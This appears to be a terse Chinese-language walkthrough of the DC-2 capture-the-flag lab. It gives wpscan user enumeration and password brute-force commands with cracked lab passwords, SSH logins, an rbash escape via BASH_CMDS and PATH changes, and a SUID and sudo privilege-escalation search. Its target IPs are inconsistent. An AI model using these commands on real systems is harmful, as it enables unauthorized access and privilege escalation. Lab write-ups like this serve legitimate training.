靶机下载地址:http://www.five86.com/downloads/DC-2.zip
kali:192.168.1.125
靶机:192.168.1.117
🐧群号:703078198
扫描同网段的IP
对着这个ip进行扫描
发现打开了80端口,我们用浏览器访问一下
发现打不开
我们去配置文件,配置一下
vim /etc/hosts
我们加上这句
保存,退出
再试试去访问一下
找到了第一个flag
我们进行目录扫描看看有没有,有用的目录
发现了一个后台登录的入口
我们得收集信息生成密码
我们用cewl爬取页面信息生成密码
我们收集到的信息都放到1.txt这个文件里了
上wpscan直接爆破
wpscan --url dc-2 -e u
爆破了三个用户 admin、jerry、tom
我们开始进行爆破密码
wpscan --url dc-2 -P pwd.txt -U admin //爆破admin的密码,无法爆出
wpscan --url dc-2 -P pwd.txt -U jerry //爆破jerry密码为 adipiscing
wpscan --url dc-2 -P pwd.txt -U tom //爆破tom密码为 parturient
登入
falg2在这
我们俩个账号登录一下ssh服务
ssh jerry@192.168.202.131 -p 7744 //-p是指定端口
ssh tom@192.168.202.131 -p 7744
发现只有tom的可以
我们使用whoami查看一下当前权限
这里被限制了
我们要绕过rbash
BASH_CMDS[a]=/bin/sh;a #调用/bin/sh命令解释器
/bin/bash
export PATH=$PATH:/bin/ #设置环境变量
export PATH=$PATH:/usr/bin
这样我们获得了shell权限
我们登录jerry这个账户
找到了flag4,在/home/jerry目录里
接下来我们要提权
find / -perm -u=s -type f 2>/dev/null
我们先
sudo -l
看看
发现git有root权限
我们用git提权
http://dljz.nicethemes.cn/news/show-128128.html
找到最后一个flag值就结束了
在root目录